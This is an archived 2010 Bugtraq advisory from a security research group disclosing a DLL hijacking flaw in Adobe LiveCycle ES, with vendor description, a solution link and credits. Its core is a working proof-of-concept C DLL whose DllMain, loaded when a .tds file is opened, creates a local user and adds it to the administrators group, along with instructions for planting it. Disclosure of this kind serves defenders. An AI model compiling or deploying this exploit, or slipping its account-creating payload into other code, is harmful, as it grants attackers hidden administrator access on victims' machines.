lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20100913184121.ko4jde6lc080gsss@mail.amnpardaz.com>
Date: Mon, 13 Sep 2010 18:41:21 +0430
From: admin@...report.ir
To: bugtraq@...urityfocus.com
Cc: vulns@...unia.com, submit@...sec.com
Subject: Adobe LiveCycle ES DLL Hijacking Exploit (.dll)

##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:		Adobe LiveCycle ES DLL Hijacking Exploit (.dll)
# Vendor:		http://www.adobe.com/products/livecycle/
# Vulnerable Version:	8.2.1.3144.1.471865
# Exploitation:		Remote Code Execution
###################################################################################

####################
- Description:
####################

Adobe® LiveCycle® Enterprise Suite (ES) software can help you extend  
the value of existing back-end systems by enabling developers to build  
and deploy applications quickly and easily, and by empowering business  
users to manage application environments based on their specific needs.
With Adobe LiveCycle ES, you can make it easier for people to interact  
with information through intuitive user experiences, improve  
efficiencies through business process automation, and enhance customer  
service through personalized communications management.


####################
- Vulnerability:
####################

+--> DLL Hijacking
	Compile the exploit and rename to .dll, create a file in the same dir  
with *.tds extension.
	(Vulnerability is discovered by DLLHijackAuditKit v2)

####################
- Exploits/PoCs:
####################

//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
   system("net user apuser appass /add");
   system("net localgroup administrators apuser /add");
   exit(0);
   return 0;
}


BOOL APIENTRY DllMain( HMODULE hModule,
                        DWORD  ul_reason_for_call,
                        LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		main();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

####################
- Solution:
####################

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

####################
- Original Advisory:
####################

http://www.bugreport.ir/index_74.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ